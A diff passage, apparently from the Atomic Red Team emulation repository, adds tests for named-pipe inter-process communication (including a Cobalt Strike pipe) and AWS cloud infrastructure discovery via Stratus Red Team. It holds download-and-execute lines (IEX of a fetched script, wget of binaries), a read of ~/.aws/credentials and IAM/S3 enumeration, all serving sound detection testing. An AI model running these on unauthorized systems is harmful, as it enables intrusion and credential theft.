+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 4
+    name: command_prompt
+    
+- name: Cobalt Strike post-exploitation pipe (before 4.2)
+  auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+  description: |
+    Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+    
+    The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Named pipe executors must exist on disk
+    prereq_command: |
+      if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe) -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe)) {exit 0} else {exit 1}
+    get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+      $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+      Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+  executor:
+    command: |
+      "PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe 5
+    name: command_prompt
@@ -0,0 +1,87 @@
+# T1580 - Cloud Infrastructure Discovery
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1580)
+<blockquote>An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS - EC2 Enumeration from Cloud Instance](#atomic-test-1---aws---ec2-enumeration-from-cloud-instance)
+
+
+<br/>
+
+## Atomic Test #1 - AWS - EC2 Enumeration from Cloud Instance
+This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| stratus_path | Path of stratus binary | path | $PathToAtomicsFolder/T1580/src|
+| aws_region | AWS region to detonate | string | us-west-2|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+export AWS_REGION=#{aws_region}
+cd #{stratus_path}
+echo "Stratus: Start Warmup."
+./stratus warmup aws.discovery.ec2-enumerate-from-instance
+echo "Stratus: Start Detonate."
+./stratus detonate aws.discovery.ec2-enumerate-from-instance
+```
+
+#### Cleanup Commands:
+```sh
+cd #{stratus_path}
+echo "Stratus: Start Cleanup."
+./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+echo "Removing Stratus artifacts from local machine."
+rm -rf stratus*
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Stratus binary must be present at the (#{stratus_path}/stratus)
+##### Check Prereq Commands:
+```sh
+if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+if [ "$(uname)" = "Darwin" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]
+then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i linux_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+  tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+fi
+```
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+```
+##### Get Prereq Commands:
+```sh
+echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,55 @@
+attack_technique: T1580
+display_name: 'Cloud Infrastructure Discovery'
+atomic_tests:
+- name: AWS - EC2 Enumeration from Cloud Instance
+  auto_generated_guid: 99ee161b-dcb1-4276-8ecb-7cfdcb207820
+  description: |
+    This atomic runs several API calls (sts:GetCallerIdentity, s3:ListBuckets, iam:GetAccountSummary, iam:ListRoles, iam:ListUsers, iam:GetAccountAuthorizationDetails, ec2:DescribeSnapshots, cloudtrail:DescribeTrails, guardduty:ListDetectors) from the context of an EC2 instance role. This simulates an attacker compromising an EC2 instance and running initial discovery commands on it. This atomic test leverages a tool called stratus-red-team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.discovery.ec2-enumerate-from-instance/
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    stratus_path:
+      description: Path of stratus binary
+      type: path
+      default: $PathToAtomicsFolder/T1580/src
+    aws_region:
+      description: AWS region to detonate
+      type: string
+      default: us-west-2
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Stratus binary must be present at the (#{stratus_path}/stratus)
+    prereq_command: |
+      if test -f "#{stratus_path}/stratus"; then exit 0; else exit 1; fi
+    get_prereq_command: |
+      if [ "$(uname)" = "Darwin" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i Darwin_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      elif [ "$(expr substr $(uname) 1 5)" = "Linux" ]
+      then DOWNLOAD_URL=$(curl -s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest | grep browser_download_url | grep -i linux_x86_64 | cut -d '"' -f 4); wget -q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL
+        tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
+      fi 
+  - description: |
+      Check if ~/.aws/credentials file has a default stanza is configured
+    prereq_command: |
+      cat ~/.aws/credentials | grep "default"
+    get_prereq_command: |
+      echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
+  executor:
+    command: |
+      export AWS_REGION=#{aws_region}
+      cd #{stratus_path}
+      echo "Stratus: Start Warmup."
+      ./stratus warmup aws.discovery.ec2-enumerate-from-instance
+      echo "Stratus: Start Detonate."
+      ./stratus detonate aws.discovery.ec2-enumerate-from-instance
+    cleanup_command: |
+      cd #{stratus_path}
+      echo "Stratus: Start Cleanup."
+      ./stratus cleanup aws.discovery.ec2-enumerate-from-instance
+      echo "Removing Stratus artifacts from local machine."
+      rm -rf stratus*
+    name: sh
+    elevation_required: false
@@ -76,11 +76,6 @@ Attackers who have permissions, can run malicious commands in containers in the



-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| command | Command to run | string | cat|
-

 #### Attack Commands: Run with `bash`! 

@@ -38,11 +38,6 @@ atomic_tests:

  supported_platforms:
  - containers
-  input_arguments:
-    command:
-      description: Command to run
-      type: string
-      default: cat
  dependencies:
  - description: |
      docker must be installed
@@ -1252,3 +1252,17 @@ e74e4c63-6fde-4ad2-9ee8-21c3a1733114
 81483501-b8a5-4225-8b32-52128e2f69db
 4541e2c2-33c8-44b1-be79-9161440f1718
 b8a563d4-a836-4993-a74e-0a19b8481bfe
+99ee161b-dcb1-4276-8ecb-7cfdcb207820
+3a15c372-67c1-4430-ac8e-ec06d641ce4d
+e62d23ef-3153-4837-8625-fa4a3829134d
+228c7498-be31-48e9-83b7-9cb906504ec8
+348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+bd13b9fc-b758-496a-b81a-397462f82c72
+830c8b6c-7a70-4f40-b975-8bbe74558acd
+d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+7a48f482-246f-4aeb-9837-21c271ebf244
+8dbfc15c-527b-4ab0-a272-019f469d367f
+3d257a03-eb80-41c5-b744-bb37ac7f65c7
+191db57d-091a-47d5-99f3-97fde53de505
+20b40ea9-0e17-4155-b8e6-244911a678ac
+433842ba-e796-4fd5-a14f-95d3a1970875